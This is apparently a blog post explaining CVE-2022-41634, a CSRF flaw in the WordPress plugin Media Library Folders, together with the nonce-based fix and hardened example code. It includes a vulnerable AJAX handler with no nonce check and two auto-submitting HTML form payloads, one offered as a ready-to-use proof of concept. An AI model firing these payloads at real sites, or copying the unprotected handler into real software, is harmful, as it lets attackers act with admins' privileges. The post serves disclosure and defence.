CVE-2022-41634 is a serious vulnerability that affected the popular WordPress plugin *Media Library Folders*, up to version 7.1.1. This bug could let bad actors trick logged-in admins into performing unwanted actions, all without their knowledge. The type of security issue is known as a *Cross-Site Request Forgery* (CSRF). In this post, we’re going to break down what CSRF is, how it played out in this plugin, show code snippets, and talk about defending your site.
What is CSRF?
Imagine you’re an admin who’s already logged into your WordPress site. If someone gets you to open a malicious page on a different website, CSRF tricks your browser into performing an action in WordPress as if you really meant to do it—like creating folders, deleting important files, or worse. The browser attaches your session cookies automatically, so the request “crosses” from the attacker’s site into your legitimate admin session without any check that you intended it. That’s the core of a CSRF attack.
About Media Library Folders
Media Library Folders is a plugin designed to help users organize WordPress media uploads. With over 100,000 active installs, it’s pretty popular.
How CVE-2022-41634 Works
The vulnerability was found in versions up to 7.1.1. The plugin’s code did not use proper security checks (WordPress *nonces*) in some of its AJAX functions. This meant an attacker could craft a page that sends a POST request to the plugin’s endpoint, and if a logged-in admin visited that page, the request would be executed (creating folders, for example) with the admin’s privileges.
Technical Details
Where’s the problem?
The plugin used AJAX endpoints (admin-ajax.php) to handle file management. Several of these did not verify the request’s origin with a security nonce.
Let’s look at an example excerpt of vulnerable code:

```php
// Hypothetical example modelled on the plugin's handler (not the plugin's exact code)
add_action('wp_ajax_mlf_create_folder', 'mlf_create_folder');

function mlf_create_folder() {
    // No check_ajax_referer() or nonce validation: any authenticated request is accepted.
    $folder_name = $_POST['folder_name'];
    // Code to create the media folder from $folder_name...
}
```
Without a nonce check on this endpoint, any request that arrives with the admin’s session cookies is accepted, no matter which site triggered it, including an attacker’s website.
What Could an Attacker Do?
Suppose the admin is browsing the web while logged into WordPress. The attacker gets the admin to visit a page containing this HTML:

```html
<form action="https://victimsite.com/wp-admin/admin-ajax.php?action=mlf_create_folder" method="POST" id="csrf_attack">
  <input type="hidden" name="folder_name" value="pwned_by_attacker">
</form>
<script>
  document.getElementById('csrf_attack').submit();
</script>
```
When the page loads, the form automatically submits. The browser, still authenticated, sends the request as if the admin meant it.
Result:

- The media folder “pwned_by_attacker” is created, without any admin approval!
- Potential for more serious modifications depending on the AJAX endpoint’s power.
- Could combine with other vulnerabilities for bigger attacks (exfiltrating files, deleting stuff, etc.).
Here’s a ready-to-use CSRF proof of concept for this bug:

```html
<!-- Replace the action URL with the target site -->
<form action="https://target-site.com/wp-admin/admin-ajax.php?action=mlf_create_folder" method="POST" id="csrf_poc">
  <input type="hidden" name="folder_name" value="attacker_folder">
</form>
<script>
  document.getElementById('csrf_poc').submit();
</script>
```
Any admin logged into the WordPress site who visits a page with this code can be exploited.
The plugin developer released a patch in version 7.2. The update adds a nonce check like this:

```php
function mlf_create_folder() {
    // Verify the 'security' POST field holds a valid nonce for the 'mlf_nonce' action;
    // check_ajax_referer() calls wp_die() and stops the request if it does not.
    check_ajax_referer('mlf_nonce', 'security');
    $folder_name = $_POST['folder_name'];
    // Rest of the code...
}
```
This check forces requests to include a special token (*nonce*) that is tied to the logged-in user’s session and to this specific action, and that expires after a limited time. An attacker’s page cannot read that token, so a forged request arrives without it and is rejected, blocking the forgery.
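A nonce check only works if the plugin’s own JavaScript actually sends the nonce, so the fix has two halves: the server-side verification shown above, and a client side that obtains the token from WordPress and includes it in every request. The following is an added example (not the plugin’s code) that wires up both halves for a hardened folder-creation endpoint. The handler name `mlf_demo_create_folder`, the script handle `mlf-demo`, the JavaScript object `mlfDemo`, and the nonce action `mlf_nonce` with the `security` field are assumptions chosen for illustration; `check_ajax_referer`, `wp_create_nonce`, `wp_localize_script`, `wp_add_inline_script`, `current_user_can`, `sanitize_file_name`, `wp_upload_dir`, `wp_mkdir_p` and `wp_send_json_*` are standard WordPress functions.

```php
<?php
// Added example: a nonce-protected AJAX endpoint and the matching client code.
// Names prefixed mlf_demo / mlfDemo and the 'mlf_nonce' action are assumptions.

// 1. Server side: register the handler and enforce the checks.
add_action('wp_ajax_mlf_demo_create_folder', 'mlf_demo_create_folder');

function mlf_demo_create_folder() {
    // Reject any request that does not carry a valid nonce for this action.
    // check_ajax_referer() reads the 'security' POST field and calls wp_die()
    // (HTTP 403, body "-1") when the nonce is missing, expired or forged.
    check_ajax_referer('mlf_nonce', 'security');

    // A nonce proves intent, not privilege: still enforce a capability.
    if (!current_user_can('upload_files')) {
        wp_send_json_error(['message' => 'Insufficient permissions'], 403);
    }

    // Never pass raw input to the filesystem; sanitize_file_name() strips
    // path separators and other characters that are unsafe in a file name.
    $folder_name = isset($_POST['folder_name'])
        ? sanitize_file_name(wp_unslash($_POST['folder_name']))
        : '';
    if ($folder_name === '') {
        wp_send_json_error(['message' => 'Invalid folder name'], 400);
    }

    // Create the folder inside the uploads directory only.
    $upload = wp_upload_dir();
    $target = trailingslashit($upload['basedir']) . $folder_name;
    if (!wp_mkdir_p($target)) {
        wp_send_json_error(['message' => 'Could not create folder'], 500);
    }
    wp_send_json_success(['folder' => $folder_name]);
}

// 2. Client side: hand a fresh nonce to the admin page so legitimate
//    requests can present it. An attacker's page cannot read this value
//    cross-origin, so a forged POST arrives without it and is rejected.
add_action('admin_enqueue_scripts', 'mlf_demo_enqueue');

function mlf_demo_enqueue($hook) {
    if ($hook !== 'upload.php') {
        return; // only the Media Library screen needs this script
    }
    // Register a handle with no file so inline JS can be attached to it.
    wp_register_script('mlf-demo', false, [], '1.0', true);
    wp_enqueue_script('mlf-demo');
    wp_localize_script('mlf-demo', 'mlfDemo', [
        'ajaxUrl' => admin_url('admin-ajax.php'),
        // Bound to the current user's session and to the 'mlf_nonce' action;
        // WordPress nonces stay valid for roughly 12 to 24 hours.
        'nonce'   => wp_create_nonce('mlf_nonce'),
    ]);

    $js = <<<'JS'
// A legitimate request: the nonce travels in the 'security' field that
// check_ajax_referer('mlf_nonce', 'security') looks for on the server.
function mlfDemoCreateFolder(name) {
    const body = new URLSearchParams({
        action: 'mlf_demo_create_folder',
        security: mlfDemo.nonce,
        folder_name: name,
    });
    return fetch(mlfDemo.ajaxUrl, { method: 'POST', credentials: 'same-origin', body: body })
        .then(function (r) { return r.json(); });
}
JS;
    wp_add_inline_script('mlf-demo', $js);
}
```

Two design points worth noting: the capability check is kept separate from the nonce check because a nonce only proves that the request came from a page WordPress rendered for this user, not that the user is allowed to do the operation; and the folder name is sanitized before it reaches the filesystem, since an endpoint that is CSRF-protected but still trusts `$_POST` verbatim remains a path-traversal risk for any authenticated user.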
References
- WPScan Advisory: CVE-2022-41634
- Plugin Changelog (Media Library Folders)
- WordFence Threat Intel
Stay safe, and keep your WordPress secure!
Have questions? Let me know in the comments, or check out the links above for the official advisories.
Timeline
Published on: 11/18/2022 23:15:00 UTC
Last modified on: 11/23/2022 18:05:00 UTC